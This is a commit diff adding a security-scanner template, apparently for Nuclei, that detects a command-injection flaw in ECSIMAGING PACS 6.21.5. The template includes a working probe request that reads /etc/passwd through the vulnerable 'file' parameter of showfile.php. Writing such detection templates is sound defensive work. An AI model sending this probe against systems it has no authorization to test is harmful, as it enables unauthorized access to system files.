Merge pull request #4377 from ritikchaddha/patch-56

Create ecsimagingpacs-rce.yaml
2022-05-12 16:49:28 +05:30 · 2022-05-12 16:49:28 +05:30 · 54fb25799c
parent 9fd0f5c51b 93c86e4adf
commit 54fb25799c
1 changed files with 26 additions and 0 deletions
--- a/vulnerabilities/other/ecsimagingpacs-rce.yaml
+++ b/vulnerabilities/other/ecsimagingpacs-rce.yaml
@ -0,0 +1,26 @@
+id: ecsimagingpacs-rce
+
+info:
+  name: ECSIMAGING PACS 6.21.5 - Remote code execution
+  author: ritikchaddha
+  severity: critical
+  description: ECSIMAGING PACS Application in 6.21.5 and bellow suffers from a OS Injection vulnerability. The parameter `file` on the webpage /showfile.php can be exploited with simple OS injection to gain root access. www-data user has sudo NOPASSWD access
+  reference: https://www.exploit-db.com/exploits/49388
+  metadata:
+    verified: false
+  tags: ecsimagingpacs,rce
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/showfile.php?file=/etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200